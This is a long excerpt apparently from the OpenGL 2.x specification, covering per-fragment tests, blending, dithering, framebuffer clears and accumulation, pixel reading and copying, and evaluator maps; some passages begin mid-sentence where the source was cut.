Writing to gl_FragDepth specifies the depth value for the fragment being processed. If the active fragment shader does not statically assign a value to gl_FragDepth, then the depth value generated during rasterization is used by subsequent stages of the pipeline. Otherwise, the value assigned to gl_FragDepth is used, and is undefined for any fragments where statements assigning a value to gl_FragDepth are not executed. Thus, if a shader statically assigns a value to gl_FragDepth, then it is responsible for always writing it.

The first test is to determine if the pixel at location (x_w, y_w) in the framebuffer is currently owned by the GL (more precisely, by this GL context). If it is not, the window system decides the fate of the incoming fragment. Possible results are that the fragment is discarded or that some subset of the subsequent per-fragment operations are applied to the fragment. This test allows the window system to control the GL's behavior, for instance, when a GL window is obscured.

If left ≤ x_w < left + width and bottom ≤ y_w < bottom + height, then the scissor test passes. Otherwise, the test fails and the fragment is discarded.
The test is enabled or disabled using Enable or Disable using the constant SCISSOR_TEST. When disabled, it is as if the scissor test always passes. If either width or height is less than zero, then the error INVALID_VALUE is generated. The state required consists of four integer values and a bit indicating whether the test is enabled or disabled. In the initial state left = bottom = 0; width and height are determined by the size of the GL window. Initially, the scissor test is disabled.

does differ, it should be defined relative to window, not screen, coordinates, so that rendering results are invariant with respect to window position.

Next, if SAMPLE_ALPHA_TO_ONE is enabled, each alpha value is replaced by the maximum representable alpha value. Otherwise, the alpha values are not changed.

Finally, if SAMPLE_COVERAGE is enabled, the fragment coverage is ANDed with another temporary coverage. This temporary coverage is generated in the same manner as the one described above, but as a function of the value of SAMPLE_COVERAGE_VALUE. The function need not be identical, but it must have the same properties of proportionality and invariance. If SAMPLE_COVERAGE_INVERT is TRUE, the temporary coverage is inverted (all bit values are inverted) before it is ANDed with the fragment coverage.

The values of SAMPLE_COVERAGE_VALUE and SAMPLE_COVERAGE_INVERT are specified by calling SampleCoverage with value set to the desired coverage value, and invert set to TRUE or FALSE. value is clamped to [0,1] before being stored as SAMPLE_COVERAGE_VALUE. SAMPLE_COVERAGE_VALUE is queried by calling GetFloatv with pname set to SAMPLE_COVERAGE_VALUE. SAMPLE_COVERAGE_INVERT is queried by calling GetBooleanv with pname set to SAMPLE_COVERAGE_INVERT.

The alpha test is specified with AlphaFunc. func is a symbolic constant indicating the alpha test function; ref is a reference value. ref is clamped to lie in [0, 1], and then converted to a fixed-point value according to the rules given for an A component in section 2.14.9.
For purposes of the alpha test, the fragment's alpha value is also rounded to the nearest integer. The possible constants specifying the test function are NEVER, ALWAYS, LESS, LEQUAL, EQUAL, GEQUAL, GREATER, or NOTEQUAL, meaning pass the fragment never, always, if the fragment's alpha value is less than, less than or equal to, equal to, greater than or equal to, greater than, or not equal to the reference value, respectively.

The required state consists of the floating-point reference value, an eight-valued integer indicating the comparison function, and a bit indicating if the comparison is enabled or disabled. The initial state is for the reference value to be 0 and the function to be ALWAYS. Initially, the alpha test is disabled.

There are two sets of stencil-related state, the front stencil state set and the back stencil state set. Stencil tests and writes use the front set of stencil state when processing fragments rasterized from non-polygon primitives (points, lines, bitmaps, image rectangles) and front-facing polygon primitives, while the back set of stencil state is used when processing fragments rasterized from back-facing polygon primitives. For the purposes of stencil testing, a primitive is still considered a polygon even if the polygon is to be rasterized as points or lines due to the current polygon mode. Whether a polygon is front- or back-facing is determined in the same manner used for two-sided lighting and face culling (see sections 2.14.1 and 3.5.1).

StencilFuncSeparate and StencilOpSeparate take a face argument which can be FRONT, BACK, or FRONT_AND_BACK and indicates which set of state is affected. StencilFunc and StencilOp set front and back stencil state to identical values.

StencilFunc and StencilFuncSeparate take three arguments that control whether the stencil test passes or fails. ref is an integer reference value that is used in the unsigned stencil comparison.
It is clamped to the range [0, 2^s − 1], where s is the number of bits in the stencil buffer. The s least significant bits of mask are bitwise ANDed with both the reference and the stored stencil value, and the resulting masked values are those that participate in the comparison controlled by func. func is a symbolic constant that determines the stencil comparison function; the eight symbolic constants are NEVER, ALWAYS, LESS, LEQUAL, EQUAL, GEQUAL, GREATER, or NOTEQUAL. Accordingly, the stencil test passes never, always, and if the masked reference value is less than, less than or equal to, equal to, greater than or equal to, greater than, or not equal to the masked stored value in the stencil buffer.

StencilOp and StencilOpSeparate take three arguments that indicate what happens to the stored stencil value if this or certain subsequent tests fail or pass. sfail indicates what action is taken if the stencil test fails. The symbolic constants are KEEP, ZERO, REPLACE, INCR, DECR, INVERT, INCR_WRAP, and DECR_WRAP. These correspond to keeping the current value, setting it to zero, replacing it with the reference value, incrementing it with saturation, decrementing it with saturation, bitwise inverting it, incrementing it without saturation, and decrementing it without saturation.

For purposes of increment and decrement, the stencil bits are considered as an unsigned integer. Incrementing or decrementing with saturation clamps the stencil value at 0 and the maximum representable value. Incrementing or decrementing without saturation will wrap such that incrementing the maximum representable value results in 0, and decrementing 0 results in the maximum representable value.

The same symbolic values are given to indicate the stencil action if the depth buffer test (see section 4.1.6) fails (dpfail), or if it passes (dppass).

If the stencil test fails, the incoming fragment is discarded.
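The eight stencil update operations just described can be sketched as a single function over an s-bit unsigned stencil value. This is an illustrative helper, not GL API code; the enum names are ours, and max denotes 2^s − 1:

```c
enum sop { KEEP, ZERO_OP, REPLACE, INCR, DECR, INVERT, INCR_WRAP, DECR_WRAP };

/* cur: stored stencil value; ref: current reference value;
 * max: maximum representable stencil value, 2^s - 1. */
static unsigned stencil_op(enum sop op, unsigned cur, unsigned ref,
                           unsigned max) {
    switch (op) {
    case KEEP:      return cur;
    case ZERO_OP:   return 0;
    case REPLACE:   return ref;
    case INCR:      return cur == max ? max : cur + 1;  /* saturate high */
    case DECR:      return cur == 0   ? 0   : cur - 1;  /* saturate low  */
    case INVERT:    return ~cur & max;                  /* bitwise invert */
    case INCR_WRAP: return cur == max ? 0   : cur + 1;  /* wrap to 0      */
    default:        return cur == 0   ? max : cur - 1;  /* DECR_WRAP      */
    }
}
```

With an 8-bit buffer (max = 255), INCR leaves 255 at 255, while INCR_WRAP takes 255 to 0, matching the saturation and wrapping rules above.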
The state required consists of the most recent values passed to StencilFunc or StencilFuncSeparate and to StencilOp or StencilOpSeparate, and a bit indicating whether stencil testing is enabled or disabled. In the initial state, stenciling is disabled, the front and back stencil reference value are both zero, the front and back stencil comparison functions are both ALWAYS, and the front and back stencil masks are both all ones. Initially, all three front and back stencil operations are KEEP.

If there is no stencil buffer, no stencil modification can occur, and it is as if the stencil tests always pass, regardless of any calls to StencilFunc.

fied as indicated below as if the depth buffer test passed. If enabled, the comparison takes place and the depth buffer and stencil value may subsequently be modified. The comparison is specified with DepthFunc. This command takes a single symbolic constant: one of NEVER, ALWAYS, LESS, LEQUAL, EQUAL, GREATER, GEQUAL, NOTEQUAL. Accordingly, the depth buffer test passes never, always, if the incoming fragment's z_w value is less than, less than or equal to, equal to, greater than, greater than or equal to, or not equal to the depth value stored at the location given by the incoming fragment's (x_w, y_w) coordinates.

If the depth buffer test fails, the incoming fragment is discarded. The stencil value at the fragment's (x_w, y_w) coordinates is updated according to the function currently in effect for depth buffer test failure. Otherwise, the fragment continues to the next operation and the value of the depth buffer at the fragment's (x_w, y_w) location is set to the fragment's z_w value. In this case the stencil value is updated according to the function currently in effect for depth buffer test success.

The necessary state is an eight-valued integer and a single bit indicating whether depth buffering is enabled or disabled. In the initial state the function is LESS and the test is disabled.
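The alpha, stencil, and depth tests all share the same eight-way comparison against a reference or stored value. A sketch of that shared predicate (our own helper, not GL API code; the enum names mirror the symbolic constants):

```c
#include <stdbool.h>

enum cmp { NEVER, ALWAYS, LESS, LEQUAL, EQUAL, GEQUAL, GREATER, NOTEQUAL };

/* Returns whether `value` passes the test against `ref` under `func`.
 * For the depth test, value is the fragment's z_w and ref is the stored
 * depth; for the stencil test, both operands would first be masked. */
static bool compare(enum cmp func, double value, double ref) {
    switch (func) {
    case NEVER:    return false;
    case ALWAYS:   return true;
    case LESS:     return value <  ref;
    case LEQUAL:   return value <= ref;
    case EQUAL:    return value == ref;
    case GEQUAL:   return value >= ref;
    case GREATER:  return value >  ref;
    default:       return value != ref;   /* NOTEQUAL */
    }
}
```

Under the initial depth function LESS, for example, an incoming z_w of 0.25 passes against a stored depth of 0.5.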
If there is no depth buffer, it is as if the depth buffer test always passes.

Occlusion queries are begun and ended by calling BeginQuery and EndQuery, where target is SAMPLES_PASSED. If BeginQuery is called with an unused id, that name is marked as used and associated with a new query object.

BeginQuery with a target of SAMPLES_PASSED resets the current samples-passed count to zero and sets the query active state to TRUE and the active query id to id. EndQuery with a target of SAMPLES_PASSED initializes a copy of the current samples-passed count into the active occlusion query object's results value, sets the active occlusion query object's result available to FALSE, sets the query active state to FALSE, and the active query id to 0.

4.1.8 Blending

Blending combines the incoming source fragment's R, G, B, and A values with the destination R, G, B, and A values stored in the framebuffer at the fragment's (x_w, y_w) location.

Source and destination values are combined according to the blend equation, quadruplets of source and destination weighting factors determined by the blend functions, and a constant blend color to obtain a new set of R, G, B, and A values, as described below. Each of these floating-point values is clamped to [0, 1] and converted back to a fixed-point value in the manner described in section 2.14.9. The resulting four values are sent to the next operation.

Blending is dependent on the incoming fragment's alpha value and that of the corresponding currently stored pixel. Blending applies only in RGBA mode; in color index mode it is bypassed. Blending is enabled or disabled using Enable or Disable with the symbolic constant BLEND. If it is disabled, or if logical operation on color values is enabled (section 4.1.10), proceed to the next operation.

If multiple fragment colors are being written to multiple buffers (see section 4.2.1), blending is computed and applied separately for each fragment color and the corresponding buffer.
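As a concrete sketch of the combination described above, the following helper applies the default FUNC_ADD equation with the common SRC_ALPHA / ONE_MINUS_SRC_ALPHA factor pair to one RGBA pixel, clamping each result to [0, 1]. This is illustrative only; it is one particular choice of blend equation and factors, not the general mechanism:

```c
/* src, dst, out: RGBA quadruplets in [0, 1].
 * out = src * A_s + dst * (1 - A_s), clamped per component. */
static void blend_src_alpha(const double src[4], const double dst[4],
                            double out[4]) {
    double sa = src[3];                      /* source alpha A_s */
    for (int i = 0; i < 4; i++) {
        double v = src[i] * sa + dst[i] * (1.0 - sa);
        out[i] = v < 0.0 ? 0.0 : (v > 1.0 ? 1.0 : v);
    }
}
```

Blending a half-transparent red source over an opaque blue destination, for instance, yields (0.5, 0, 0.5, 0.75).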
Blend Equation

Blending is controlled by the blend equations, defined by the commands BlendEquation and BlendEquationSeparate.

Blend Functions

The weighting factors used by the blend equation are determined by the blend functions. Blend functions are specified with the commands BlendFunc and BlendFuncSeparate.

Table 4.2: RGB and ALPHA source and destination blending functions and the corresponding blend factors. Addition and subtraction of triplets is performed component-wise.
1. SRC_ALPHA_SATURATE is valid only for source RGB and alpha blending functions.
2. f = min(A_s, 1 − A_d).

Blend Color

The constant color C_c to be used in blending is specified with the command BlendColor. The four parameters are clamped to the range [0, 1] before being stored. The constant color can be used in both the source and destination blending functions.

Blending State

The state required for blending is two integers for the RGB and alpha blend equations, four integers indicating the source and destination RGB and alpha blending functions, four floating-point values to store the RGBA constant blend color, and a bit indicating whether blending is enabled or disabled. The initial blend equations for RGB and alpha are both FUNC_ADD. The initial blending functions are ONE for the source RGB and alpha functions and ZERO for the destination RGB and alpha functions. The initial constant blend color is (R, G, B, A) = (0, 0, 0, 0). Initially, blending is disabled.

Blending occurs once for each color buffer currently enabled for writing (section 4.2.1) using each buffer's color for C_d. If a color buffer has no A value, then A_d is taken to be 1.

4.1.9 Dithering

Dithering selects between two color values or indices. In RGBA mode, consider the value of any of the color components as a fixed-point value with m bits to the left of the binary point, where m is the number of bits allocated to that component in the framebuffer; call each such value c.
For each c, dithering selects a value c1 such that c1 ∈ {max{0, ⌈c⌉ − 1}, ⌈c⌉} (after this selection, treat c1 as a fixed-point value in [0,1] with m bits). This selection may depend on the x_w and y_w coordinates of the pixel. In color index mode, the same rule applies with c being a single color index. c must not be larger than the maximum value representable in the framebuffer for either the component or the index, as appropriate.

Many dithering algorithms are possible, but a dithered value produced by any algorithm must depend only on the incoming value and the fragment's x and y window coordinates. If dithering is disabled, then each color component is truncated to a fixed-point value with as many bits as there are in the corresponding component in the framebuffer; a color index is rounded to the nearest integer representable in the color index portion of the framebuffer.

Dithering is enabled with Enable and disabled with Disable using the symbolic constant DITHER. The state required is thus a single bit. Initially, dithering is enabled.

Stencil, depth, blending, and dithering operations are performed for a pixel sample only if that sample's fragment coverage bit is a value of 1. If the corresponding coverage bit is 0, no operations are performed for that sample.

If MULTISAMPLE is disabled, and the value of SAMPLE_BUFFERS is one, the fragment may be treated exactly as described above, with optimization possible because the fragment coverage must be set to full coverage. Further optimization is allowed, however. An implementation may choose to identify a centermost sample, and to perform alpha, stencil, and depth tests on only that sample. Regardless of the outcome of the stencil test, all multisample buffer stencil sample values are set to the appropriate new stencil value.
If the depth test passes, all multisample buffer depth sample values are set to the depth of the fragment's centermost sample's depth value, and all multisample buffer color sample values are set to the color value of the incoming fragment. Otherwise, no change is made to any multisample buffer color or depth value.

After all operations have been completed on the multisample buffer, the sample values for each color in the multisample buffer are combined to produce a single color value, and that value is written into the corresponding color buffers selected by DrawBuffer or DrawBuffers. An implementation may defer the writing of the color buffers until a later time, but the state of the framebuffer must behave as if the color buffers were updated as each fragment was processed. The method of combination is not specified, though a simple average computed independently for each color component is recommended.

DrawBuffer defines the set of color buffers to which fragment color zero is written. buf is a symbolic constant specifying zero, one, two, or four buffers for writing. The constants are NONE, FRONT LEFT, FRONT RIGHT, BACK LEFT, BACK RIGHT, FRONT, BACK, LEFT, RIGHT, FRONT AND BACK, and AUX0 through AUXm, where m + 1 is the number of available auxiliary buffers.

The constants refer to the four potentially visible buffers front left, front right, back left, and back right, and to the auxiliary buffers. Arguments other than AUXi that omit reference to LEFT or RIGHT refer to both left and right buffers. Arguments other than AUXi that omit reference to FRONT or BACK refer to both front and back buffers. AUXi enables drawing only to auxiliary buffer i. Each AUXi adheres to AUXi = AUX0 + i. The constants and the buffers they indicate are summarized in table 4.4. If DrawBuffer is supplied with a constant (other than NONE) that does not indicate any of the color buffers allocated to the GL context, the error INVALID OPERATION results.
DrawBuffer will set the draw buffer for fragment colors other than zero to NONE. The command DrawBuffers defines the draw buffers to which all fragment colors are written. n specifies the number of buffers in bufs. bufs is a pointer to an array of symbolic constants specifying the buffer to which each fragment color is written. The constants may be NONE, FRONT LEFT, FRONT RIGHT, BACK LEFT, BACK RIGHT, and AUX0 through AUXm, where m + 1 is the number of available auxiliary buffers. The draw buffers being defined correspond in order to the respective fragment colors. The draw buffer for fragment colors beyond n is set to NONE.

Table 4.4: Arguments to DrawBuffer and the buffers that they indicate.

Except for NONE, a buffer may not appear more than once in the array pointed to by bufs. Specifying a buffer more than once will result in the error INVALID OPERATION.

If fixed-function fragment shading is being performed, DrawBuffers specifies a set of draw buffers into which the fragment color is written. If a fragment shader writes to gl FragColor, DrawBuffers specifies a set of draw buffers into which the single fragment color defined by gl FragColor is written. If a fragment shader writes to gl FragData, DrawBuffers specifies a set of draw buffers into which each of the multiple fragment colors defined by gl FragData are separately written. If a fragment shader writes to neither gl FragColor nor gl FragData, the values of the fragment colors following shader execution are undefined, and may differ for each fragment color.

The maximum number of draw buffers is implementation dependent and must be at least 1. The number of draw buffers supported can be queried by calling GetIntegerv with the symbolic constant MAX DRAW BUFFERS.

The constants FRONT, BACK, LEFT, RIGHT, and FRONT AND BACK are not valid in the bufs array passed to DrawBuffers, and will result in the error INVALID OPERATION. This restriction is because these constants may themselves refer to multiple buffers, as shown in table 4.4.
If DrawBuffers is supplied with a constant (other than NONE) that does not indicate any of the color buffers allocated to the GL context, the error INVALID OPERATION will be generated. If n is greater than the value of MAX DRAW BUFFERS, the error INVALID VALUE will be generated.

Indicating a buffer or buffers using DrawBuffer or DrawBuffers causes subsequent pixel color value writes to affect the indicated buffers. Specifying NONE as the draw buffer for a fragment color will inhibit that fragment color from being written to any buffer.

Monoscopic contexts include only left buffers, while stereoscopic contexts include both left and right buffers. Likewise, single buffered contexts include only front buffers, while double buffered contexts include both front and back buffers. The type of context is selected at GL initialization.

The state required to handle color buffer selection is an integer for each supported fragment color. In the initial state, the draw buffer for fragment color zero is FRONT if there are no back buffers; otherwise it is BACK. The initial state of draw buffers for fragment colors other than zero is NONE.

IndexMask and ColorMask control the color buffer or buffers (depending on which buffers are currently indicated for writing). The least significant n bits of mask, where n is the number of bits in a color index buffer, specify a mask. Where a 1 appears in this mask, the corresponding bit in the color index buffer (or buffers) is written; where a 0 appears, the bit is not written. This mask applies only in color index mode. In RGBA mode, ColorMask is used to mask the writing of R, G, B and A values to the color buffer or buffers. r, g, b, and a indicate whether R, G, B, or A values, respectively, are written or not (a value of TRUE means that the corresponding value is written). In the initial state, all bits (in color index mode) and all color values (in RGBA mode) are enabled for writing.
The depth buffer can be enabled or disabled for writing zw values using DepthMask. If mask is non-zero, the depth buffer is enabled for writing; otherwise, it is disabled. In the initial state, the depth buffer is enabled for writing.

ClearColor sets the clear value for the color buffers in RGBA mode. Each of the specified components is clamped to [0, 1] and converted to fixed-point according to the rules of section 2.14.9. ClearIndex sets the clear color index. index is converted to a fixed-point value with unspecified precision to the left of the binary point; the integer part of this value is then masked with 2^m − 1, where m is the number of bits in a color index value stored in the framebuffer. ClearDepth takes a floating-point value that is clamped to the range [0, 1] and converted to fixed-point according to the rules for a window z value given in section 2.11.1. Similarly, ClearStencil takes a single integer argument that is the value to which to clear the stencil buffer; s is masked to the number of bitplanes in the stencil buffer. ClearAccum takes four floating-point arguments that are the values, in order, to which to set the R, G, B, and A values of the accumulation buffer (see the next section). These values are clamped to the range [−1, 1] when they are specified.

When Clear is called, the only per-fragment operations that are applied (if enabled) are the pixel ownership test, the scissor test, and dithering. The masking operations described in the last section (4.2.2) are also effective. If a buffer is not present, then a Clear directed at that buffer has no effect.

The state required for clearing is a clear value for each of the color buffer, the depth buffer, the stencil buffer, and the accumulation buffer. Initially, the RGBA color clear value is (0, 0, 0, 0), the clear color index is 0, and the stencil buffer and accumulation buffer clear values are all 0. The depth buffer clear value is initially 1.0.
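The index-masking rule for the clear color index can be sketched directly. This is a hedged Python illustration (not GL API code) of masking the integer part of index with 2^m − 1:

```python
def masked_clear_index(index, m):
    """ClearIndex-style masking: the integer part of index is masked
    with 2**m - 1, where m is the bit depth of the index buffer."""
    return int(index) & ((1 << m) - 1)

if __name__ == "__main__":
    print(masked_clear_index(260, 8))  # wraps into an 8-bit index buffer
```

The same wrap-around applies to the stencil clear value, which is masked to the number of stencil bitplanes.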
The RETURN operation takes each color value from the accumulation buffer, multiplies each of the R, G, B, and A components by value, and clamps the results to the range [0, 1]. The resulting color value is placed in the buffers currently enabled for color writing as if it were a fragment produced from rasterization, except that the only per-fragment operations that are applied (if enabled) are the pixel ownership test, the scissor test (section 4.1.2), and dithering (section 4.1.9). Color masking (section 4.2.2) is also applied.

The MULT operation multiplies each R, G, B, and A in the accumulation buffer by value and then returns the scaled color components to their corresponding accumulation buffer locations. ADD is the same as MULT except that value is added to each of the color components.

The color components operated on by Accum must be clamped only if the operation is RETURN. In this case, a value sent to the enabled color buffers is first clamped to [0, 1]. Otherwise, results are undefined if the result of an operation on a color component is out of the range [−1, 1].

If there is no accumulation buffer, or if the GL is in color index mode, Accum generates the error INVALID OPERATION. No state (beyond the accumulation buffer itself) is required for accumulation buffering.

ignored. The error INVALID OPERATION results if there is no stencil buffer.

[Figure 4.2 (operation of ReadPixels): convert to float → pixel transfer operations (color table lookup) → conversion of RGB to L → clamp to [0, 1] or mask to 2^n − 1 → pixel storage operations (pack).]

ReadBuffer takes a symbolic constant as argument. The possible values are FRONT LEFT, FRONT RIGHT, BACK LEFT, BACK RIGHT, FRONT, BACK, LEFT, RIGHT, and AUX0 through AUXn. FRONT and LEFT refer to the front left buffer, BACK refers to the back left buffer, and RIGHT refers to the front right buffer. The other constants correspond directly to the buffers that they name. If the requested buffer is missing, then the error INVALID OPERATION is generated.
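The Accum arithmetic above — MULT and ADD operating in the extended [−1, 1] range, with clamping applied only by RETURN — can be modeled with a small sketch. This is illustrative Python, not GL API code; the operation names mirror the spec's symbolic constants.

```python
def accum_op(op, accum, value):
    """Sketch of Accum arithmetic on one RGBA tuple from the accumulation
    buffer. Only RETURN clamps; MULT/ADD results outside [-1, 1] are
    undefined in the real GL."""
    if op == "MULT":
        return tuple(c * value for c in accum)
    if op == "ADD":
        return tuple(c + value for c in accum)
    if op == "RETURN":
        # Clamp to [0, 1] before the value reaches the color buffers.
        return tuple(min(1.0, max(0.0, c * value)) for c in accum)
    raise ValueError(op)

if __name__ == "__main__":
    acc = (0.5, 0.5, 0.5, 1.0)
    acc = accum_op("MULT", acc, 2.0)
    print(accum_op("RETURN", acc, 0.5))
```

The typical antialiasing use — accumulate several jittered frames with ACCUM, then RETURN with 1/n — relies exactly on RETURN's final clamp.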
The initial setting for ReadBuffer is FRONT if there is no back buffer and BACK otherwise.

ReadPixels obtains values from the selected buffer from each pixel with lower left hand corner at (x + i, y + j) for 0 ≤ i < width and 0 ≤ j < height; this pixel is said to be the ith pixel in the jth row. If any of these pixels lies outside of the window allocated to the current GL context, the values obtained for those pixels are undefined. Results are also undefined for individual pixels that are not owned by the current context. Otherwise, ReadPixels obtains values from the selected buffer, regardless of how those values were placed there.

If the GL is in RGBA mode, and format is one of RED, GREEN, BLUE, ALPHA, RGB, RGBA, BGR, BGRA, LUMINANCE, or LUMINANCE ALPHA, then red, green, blue, and alpha values are obtained from the selected buffer at each pixel location. If the framebuffer does not support alpha values then the A that is obtained is 1.0. If format is COLOR INDEX and the GL is in RGBA mode then the error INVALID OPERATION occurs. If the GL is in color index mode, and format is not DEPTH COMPONENT or STENCIL INDEX, then the color index is obtained at each pixel location.

Conversion to L

This step applies only to RGBA component groups, and only if the format is either LUMINANCE or LUMINANCE ALPHA. A value L is computed as

    L = R + G + B

where R, G, and B are the values of the R, G, and B components. The single computed L component replaces the R, G, and B components in the group.

Final Conversion

For an index, if the type is not FLOAT, final conversion consists of masking the index with the value given in table 4.6; if the type is FLOAT, then the integer index is converted to a GL float data value. For an RGBA color, each component is first clamped to [0, 1]. Then the appropriate conversion formula from table 4.7 is applied to the component.

Table 4.6: Index masks used by ReadPixels. Floating point data are not masked.
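The RGB-to-L and final-conversion steps above can be sketched as follows. This is an illustrative Python model, not GL API code; the rounding mode in `final_convert_clamped` is an assumption chosen for the sketch (the table 4.7 equations specify the scale factor, not a rounding mode).

```python
def rgba_to_luminance(r, g, b, a):
    """RGB-to-L step for LUMINANCE formats: L = R + G + B.
    The computed L replaces R, G, and B in the group (A is untouched)."""
    return r + g + b

def final_convert_clamped(f, n_bits):
    """Final conversion for an unsigned normalized component:
    clamp to [0, 1], then scale by 2**n - 1 (rounded to nearest here,
    as an illustrative choice)."""
    f = min(1.0, max(0.0, f))
    return round((2**n_bits - 1) * f)

if __name__ == "__main__":
    # Three mid-grey components sum to an L that may exceed 1 before clamping.
    L = rgba_to_luminance(0.5, 0.5, 0.5, 1.0)
    print(L, final_convert_clamped(L, 8))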
the pixels are packed into the buffer relative to this offset; otherwise, data is a pointer to a block of client memory and the pixels are packed into the client memory relative to the pointer. If a pixel pack buffer object is bound and packing the pixel data according to the pixel pack storage state would access memory beyond the size of the pixel pack buffer's memory size, an INVALID OPERATION error results. If a pixel pack buffer object is bound and data is not evenly divisible by the number of basic machine units needed to store in memory the corresponding GL data type from table 3.5 for the type parameter, an INVALID OPERATION error results.

Groups of elements are placed in memory just as they are taken from memory for DrawPixels. That is, the ith group of the jth row (corresponding to the ith pixel in the jth row) is placed in memory just where the ith group of the jth row would be taken from for DrawPixels. See Unpacking under section 3.6.4. The only difference is that the storage mode parameters whose names begin with PACK are used instead of those whose names begin with UNPACK. If the format is RED, GREEN, BLUE, ALPHA, or LUMINANCE, only the corresponding single element is written. Likewise if the format is LUMINANCE ALPHA, RGB, or BGR, only the corresponding two or three elements are written. Otherwise all the elements of each group are written.

Table 4.7: Reversed component conversions, used when component data are being returned to client memory. Color, normal, and depth components are converted from the internal floating-point representation (f) to a datum of the specified GL data type (c) using the specified equation. All arithmetic is done in the internal floating point format. These conversions apply to component data returned by GL query commands and to components of pixel data returned to client memory. The equations remain the same even if the implemented ranges of the GL data types are greater than the minimum required ranges. (See table 2.2.)
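The row/group placement rule above can be sketched numerically. This is an illustrative Python model (not GL API code) of where the ith group of the jth row lands, in elements; it deliberately ignores PACK ALIGNMENT and the skip parameters, which the real packing rules also apply.

```python
def packed_offset(i, j, row_length, group_size):
    """Element offset of the ith group of the jth row in packed client
    memory, for a simple tightly packed layout (alignment and skip
    parameters omitted for clarity)."""
    return (j * row_length + i) * group_size

if __name__ == "__main__":
    # Group (i=2, j=3) of a 10-pixel-wide RGBA image.
    print(packed_offset(2, 3, 10, 4))
```

With the real PACK parameters, the row stride is rounded up to the alignment and offset by PACK SKIP PIXELS / PACK SKIP ROWS; the sketch shows only the row-major ordering the spec mandates.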
Equations with N as the exponent are performed for each bitfield of the packed data type, with N set to the number of bits in the bitfield.

[Figure 4.3 (operation of CopyPixels): convert to float → color table lookup → further pixel transfer operations.]

The first four arguments to CopyPixels have the same interpretation as the corresponding arguments to ReadPixels. Values are obtained from the framebuffer, converted (if appropriate), then subjected to the pixel transfer operations described in section 3.6.5, just as if ReadPixels were called with the corresponding arguments. If the type is STENCIL or DEPTH, then it is as if the format for ReadPixels were STENCIL INDEX or DEPTH COMPONENT, respectively. If the type is COLOR, then if the GL is in RGBA mode, it is as if the format were RGBA, while if the GL is in color index mode, it is as if the format were COLOR INDEX.

The groups of elements so obtained are then written to the framebuffer just as if DrawPixels had been given width and height, beginning with final conversion of elements. The effective format is the same as that already described.

Special Functions

This chapter describes additional GL functionality that does not fit easily into any of the preceding chapters. This functionality consists of evaluators (used to model curves and surfaces), selection (used to locate rendered primitives on the screen), feedback (which returns GL results before rasterization), display lists (used to designate a group of GL commands for later execution by the GL), flushing and finishing (used to synchronize the GL command stream), and hints.

5.1 Evaluators

Evaluators provide a means to use a polynomial or rational polynomial mapping to produce vertex, normal, and texture coordinates, and colors. The values so produced are sent on to further stages of the GL as if they had been provided directly by the client. Transformations, lighting, primitive assembly, rasterization, and per-pixel operations are not affected by the use of evaluators.
Consider the Rk-valued polynomial p(u) defined by

    p(u) = Σ_{i=0}^{n} B_i^n(u) R_i        (5.1)

with R_i ∈ Rk and

    B_i^n(u) = C(n, i) u^i (1 − u)^(n−i),

the ith Bernstein polynomial of degree n (recall that 0^0 ≡ 1 and C(n, 0) ≡ 1). Each R_i is a control point. The relevant command is Map1.

Table 5.1: Values specified by the target to Map1. Values are given in the order in which they are taken.

    target                  k   Values
    MAP1 VERTEX 3           3   x, y, z vertex coordinates
    MAP1 VERTEX 4           4   x, y, z, w vertex coordinates
    MAP1 INDEX              1   color index
    MAP1 COLOR 4            4   R, G, B, A
    MAP1 NORMAL             3   x, y, z normal coordinates
    MAP1 TEXTURE COORD 1    1   s texture coordinate
    MAP1 TEXTURE COORD 2    2   s, t texture coordinates
    MAP1 TEXTURE COORD 3    3   s, t, r texture coordinates
    MAP1 TEXTURE COORD 4    4   s, t, r, q texture coordinates

target is a symbolic constant indicating the range of the defined polynomial. Its possible values, along with the evaluations that each indicates, are given in table 5.1. order is equal to n + 1; the error INVALID VALUE is generated if order is less than one or greater than MAX EVAL ORDER. points is a pointer to a set of n + 1 blocks of storage. Each block begins with k single-precision floating-point or double-precision floating-point values, respectively. The rest of the block may be filled with arbitrary data. Table 5.1 indicates how k depends on target and what the k values represent in each case.

stride is the number of single- or double-precision values (as appropriate) in each block of storage. The error INVALID VALUE results if stride is less than k. The order of the polynomial, order, is also the number of blocks of storage containing control points.

u1 and u2 give two floating-point values that define the endpoints of the pre-image of the map. When a value u′ is presented for evaluation, the formula used is

    p′(u′) = p((u′ − u1) / (u2 − u1)).

The error INVALID VALUE results if u1 = u2.
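Equation 5.1 and the domain remapping can be evaluated directly. This is an illustrative Python sketch (not GL API code) for scalar control points; the function names are invented for the example.

```python
from math import comb

def bernstein(i, n, u):
    """B_i^n(u) = C(n, i) * u**i * (1 - u)**(n - i)."""
    return comb(n, i) * u**i * (1 - u)**(n - i)

def eval_map1(control_points, u1, u2, u):
    """Evaluate p'(u) = p((u - u1)/(u2 - u1)), equation 5.1, for scalar
    control points R_0..R_n (order = n + 1)."""
    n = len(control_points) - 1
    t = (u - u1) / (u2 - u1)   # map the [u1, u2] pre-image onto [0, 1]
    return sum(bernstein(i, n, t) * r for i, r in enumerate(control_points))

if __name__ == "__main__":
    # Two control points give a degree-1 (linear) map.
    print(eval_map1([0.0, 1.0], 2.0, 4.0, 3.0))
```

For k-component control points (table 5.1), the same sum is applied component-wise; real GL implementations typically use a numerically stabler scheme such as de Casteljau's algorithm, which computes the same polynomial.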
Map2 is analogous to Map1, except that it describes bivariate polynomials of the form

    p(u, v) = Σ_{i=0}^{n} Σ_{j=0}^{m} B_i^n(u) B_j^m(v) R_ij.

[Figure 5.1 (map evaluation): EvalMesh and EvalPoint generate integer grid indices k and l; MapGrid maps them affinely (Ax + b) from [0, 1] into the domains [u1, u2] and [v1, v2]; Map then evaluates Σ B_i R_i to produce vertices, normals, texture coordinates, and colors.]

target is a range type selected from the same group as is used for Map1, except that the string MAP1 is replaced with MAP2. points is a pointer to (n + 1)(m + 1) blocks of storage (uorder = n + 1 and vorder = m + 1; the error INVALID VALUE is generated if either uorder or vorder is less than one or greater than MAX EVAL ORDER). The values comprising R_ij are located (ustride)i + (vstride)j values past points. When u′ and v′ are presented for evaluation, the formula used is

    p′(u′, v′) = p((u′ − u1) / (u2 − u1), (v′ − v1) / (v2 − v1)).

The evaluation of a defined map is enabled or disabled with Enable and Disable using the constant corresponding to the map as described above. The evaluator map generates only coordinates for texture unit TEXTURE0. The error INVALID VALUE results if either ustride or vstride is less than k, or if u1 is equal to u2, or if v1 is equal to v2. If the value of ACTIVE TEXTURE is not TEXTURE0, calling Map{12} generates the error INVALID OPERATION.

